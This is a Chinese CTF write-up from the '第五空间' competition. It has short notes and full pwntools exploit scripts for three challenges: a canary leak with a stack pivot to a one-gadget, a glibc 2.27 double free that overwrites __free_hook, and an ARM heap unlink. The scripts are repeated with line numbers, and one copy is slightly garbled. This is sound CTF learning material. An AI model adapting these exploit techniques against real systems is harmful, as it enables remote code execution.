2020-06-24

第五空间

我是一只懒狗,起床为了吃饭,吃饭为了睡觉,睡觉为了起床

twice

read没有0截断,所以puts打印出stack地址和canary值,然后第二轮修改rbp的值,用leave_ret栈迁移,此处是抬栈,然后执行上方布置的ROP链

from pwn import*
context.log_level ='DEBUG'
p = process('./main')
p = remote('121.36.59.116',9999)
elf =ELF('./main')
libc =ELF('./libc-2.23.so')
pop_rdi_ret = 0x0000000000400923
leave_ret = 0x0000000000400879
payload = 'U'*0x55 + 'FMYY'
p.sendafter('>',payload)
p.recvuntil('FMYY')
canary = u64(p.recv(7).rjust(8,'\x00'))
stack = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))
log.info('Canary:\t' + hex(canary))
log.info('Stack:\t' + hex(stack))
payload = p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
payload = payload.ljust(0x58,'\x00')
payload += p64(canary) + p64(stack - 0x78) + p64(leave_ret)
p.sendafter('>',payload)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['puts']
log.info('LIBC:\t' + hex(libc_base))
system = libc.sym['system'] + libc_base
binsh = libc.search('/bin/sh').next() + libc_base
rce = libc_base + 0x4526A
p.sendafter('>','FMYY')
payload = 'U'*0x58 + p64(canary) + 'U'*0x8 + p64(rce)
p.sendafter('>',payload)
p.interactive()

OF

给了源码,但是源码和远程编译出的文件不一样,简单的2.27下的double free


from pwn import*
context.log_level ='DEBUG'
def new(index):
	p.sendlineafter('choice:','1')
	p.sendlineafter('Index:',str(index))
def edit(index,content):
	p.sendlineafter('choice:','2')
	p.sendlineafter('Index:',str(index))
	p.sendafter('Content:',content)
def show(index):
	p.sendlineafter('choice:','3')
	p.sendlineafter('Index:',str(index))
def free(index):
	p.sendlineafter('choice:','4')
	p.sendlineafter('Index:',str(index))

p = process('./main')
p = remote('121.36.74.70',9999)
libc =ELF('./libc-2.27.so')
for i in range(7):
	new(i)
new(7)
new(8)
for i in range(8):
	free(i)
for i in range(7):
	new(i)
new(7)
show(7)
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x60 - 0x10
log.info('LIBC:\t' + hex(libc_base))
rce = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()
free_hook = libc_base + libc.sym['__free_hook']
free(7)

edit(7,p64(free_hook))
new(8)
new(9)
edit(9,p64(rce))
edit(0,'/bin/sh\x00')
free(0)
p.interactive()

easypwn

1	$ qemu-arm -g 1234 -L . ./main
2	$ gdb > target remote localhost:1234

进行调试,漏洞堆溢出,最终是unlink实现任意写

from pwn import*
context.log_level ='DEBUG'
def new(size,content):
	p.sendlineafter('>>> ','2')
	p.sendlineafter('Length:',str(size))
	p.sendafter('Tag:',content)
def show():
	p.sendlineafter('>>> ','1')
def edit(index,size,content):
	p.sendlineafter('>>> ','3')
	p.sendlineafter('Index:',str(index))
	p.sendlineafter('Length:',str(size))
	p.sendafter('Tag:',content)
def free(index):
	p.sendlineafter('>>> ','4')
	p.sendlineafter('Tag:',str(index))

p = process('qemu-arm -g 1234 -L . ./main',shell=True)
elf =ELF('./main')
p = remote('121.36.58.215',1337)
'''
new(0x10,'FMYY')
new(0x38,'FMYY')
new(0x38,'FMYY')
new(0x38,'FMYY')
new(0x10,'FMYY')
edit(0,0x18,'\x00'*0x14 + p32(0xC1))
free(1)
new(0x38,'FMYY') #2
show()
p.recvuntil('2 : ')
libc_base = u32(p.recv(4)) - 0x9A8EC
log.success('LIBC:\t' + hex(libc_base))
system = libc_base + 0x51800
new(0x38,'FMYY')
new(0x38,'FMYY')

free(2)
free(5)
free(0)
'''
new(0x10,'FMYY')
new(0x60,'FMYY')
new(0x10,'FMYY')

paylaod =  p32(0)  +p32(0x20) + p32(0x2106C - 0xC) + p32(0x2106C - 8) + p32(0x10) + p32(0x68)
edit(0,0x18,paylaod)
free(1)

edit(0,0x20,p64(0) + p32(0x10) + p32(0x2100C) + p32(0x10) + p32(0x21038) + p32(0x10) + p32(0x21030))

edit(1,4,p32(0x103E4))
free(0)

libc_base = u32(p.recv(4)) - 0x355B4
log.success('LIBC:\t' + hex(libc_base))
system = libc_base + 0x51800
edit(2,4,p32(system))
p.sendline('sh')
p.interactive()

1	from pwn import*
2	context.log_level ='DEBUG'
3	p = process('./main')
4	p = remote('121.36.59.116',9999)
5	elf =ELF('./main')
6	libc =ELF('./libc-2.23.so')
7	pop_rdi_ret = 0x0000000000400923
8	leave_ret = 0x0000000000400879
9	payload = 'U'*0x55 + 'FMYY'
10	p.sendafter('>',payload)
11	p.recvuntil('FMYY')
12	canary = u64(p.recv(7).rjust(8,'\x00'))
13	stack = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00'))
14	log.info('Canary:\t' + hex(canary))
15	log.info('Stack:\t' + hex(stack))
16	payload = p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
17	payload = payload.ljust(0x58,'\x00')
18	payload += p64(canary) + p64(stack - 0x78) + p64(leave_ret)
19	p.sendafter('>',payload)
20	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['puts']
21	log.info('LIBC:\t' + hex(libc_base))
22	system = libc.sym['system'] + libc_base
23	binsh = libc.search('/bin/sh').next() + libc_base
24	rce = libc_base + 0x4526A
25	p.sendafter('>','FMYY')
26	payload = 'U'0x58 + p64(canary) + 'U'0x8 + p64(rce)
27	p.sendafter('>',payload)
28	p.interactive()

1
2	from pwn import*
3	context.log_level ='DEBUG'
4	def new(index):
5	p.sendlineafter('choice:','1')
6	p.sendlineafter('Index:',str(index))
7	def edit(index,content):
8	p.sendlineafter('choice:','2')
9	p.sendlineafter('Index:',str(index))
10	p.sendafter('Content:',content)
11	def show(index):
12	p.sendlineafter('choice:','3')
13	p.sendlineafter('Index:',str(index))
14	def free(index):
15	p.sendlineafter('choice:','4')
16	p.sendlineafter('Index:',str(index))
17
18	p = process('./main')
19	p = remote('121.36.74.70',9999)
20	libc =ELF('./libc-2.27.so')
21	for i in range(7):
22	new(i)
23	new(7)
24	new(8)
25	for i in range(8):
26	free(i)
27	for i in range(7):
28	new(i)
29	new(7)
30	show(7)
31	libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x60 - 0x10
32	log.info('LIBC:\t' + hex(libc_base))
33	rce = libc_base + libc.sym['system']
34	binsh = libc_base + libc.search('/bin/sh').next()
35	free_hook = libc_base + libc.sym['__free_hook']
36	free(7)
37
38	edit(7,p64(free_hook))
39	new(8)
40	new(9)
41	edit(9,p64(rce))
42	edit(0,'/bin/sh\x00')
43	free(0)
44	p.interactive()

1	from pwn import*
2	context.log_level ='DEBUG'
3	def new(size,content):
4	p.sendlineafter('>>> ','2')
5	p.sendlineafter('Length:',str(size))
6	p.sendafter('Tag:',content)
7	def show():
8	p.sendlineafter('>>> ','1')
9	def edit(index,size,content):
10	p.sendlineafter('>>> ','3')
11	p.sendlineafter('Index:',str(index))
12	p.sendlineafter('Length:',str(size))
13	p.sendafter('Tag:',content)
14	def free(index):
15	p.sendlineafter('>>> ','4')
16	p.sendlineafter('Tag:',str(index))
17
18	p = process('qemu-arm -g 1234 -L . ./main',shell=True)
19	elf =ELF('./main')
20	p = remote('121.36.58.215',1337)
21	'''
22	new(0x10,'FMYY')
23	new(0x38,'FMYY')
24	new(0x38,'FMYY')
25	new(0x38,'FMYY')
26	new(0x10,'FMYY')
27	edit(0,0x18,'\x00'*0x14 + p32(0xC1))
28	free(1)
29	new(0x38,'FMYY') #2
30	show()
31	p.recvuntil('2 : ')
32	libc_base = u32(p.recv(4)) - 0x9A8EC
33	log.success('LIBC:\t' + hex(libc_base))
34	system = libc_base + 0x51800
35	new(0x38,'FMYY')
36	new(0x38,'FMYY')
37
38	free(2)
39	free(5)
40	free(0)
41	'''
42	new(0x10,'FMYY')
43	new(0x60,'FMYY')
44	new(0x10,'FMYY')
45
46	paylaod = p32(0) +p32(0x20) + p32(0x2106C - 0xC) + p32(0x2106C - 8) + p32(0x10) + p32(0x68)
47	edit(0,0x18,paylaod)
48	free(1)
49
50	edit(0,0x20,p64(0) + p32(0x10) + p32(0x2100C) + p32(0x10) + p32(0x21038) + p32(0x10) + p32(0x21030))
51
52	edit(1,4,p32(0x103E4))
53	free(0)
54
55	libc_base = u32(p.recv(4)) - 0x355B4
56	log.success('LIBC:\t' + hex(libc_base))
57	system = libc_base + 0x51800
58	edit(2,4,p32(system))
59	p.sendline('sh')
60	p.interactive()